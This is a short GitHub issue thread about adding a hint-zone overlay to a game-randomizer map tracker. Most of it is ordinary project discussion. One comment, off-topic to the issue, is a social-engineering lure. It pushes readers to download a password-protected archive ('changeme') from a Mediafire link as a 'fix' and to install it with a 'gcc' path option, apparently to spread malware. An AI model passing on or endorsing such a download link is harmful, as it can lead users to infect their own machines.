### ISSUE TITLE
Hint zones overlay

### ISSUE THREAD

**Issue by AudioPixie** [AudioPixie/TPRTracker#66]
A visual overlay for what checks belong to which in-game hint zones. Also want to make sure there aren't any confusing hint placements on the map, although after moving Plumm I don't think there are any left. The functionality already exists in the tracker, would just need to make the overlay. Iirc there is a bit of an annoyance with layering all the things on the map (overlay has to be over top of checks with how everything is currently structured).

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AudioPixie** [comment]
moved checks around and made overlay. All dungeon/area boxes are now hint zones
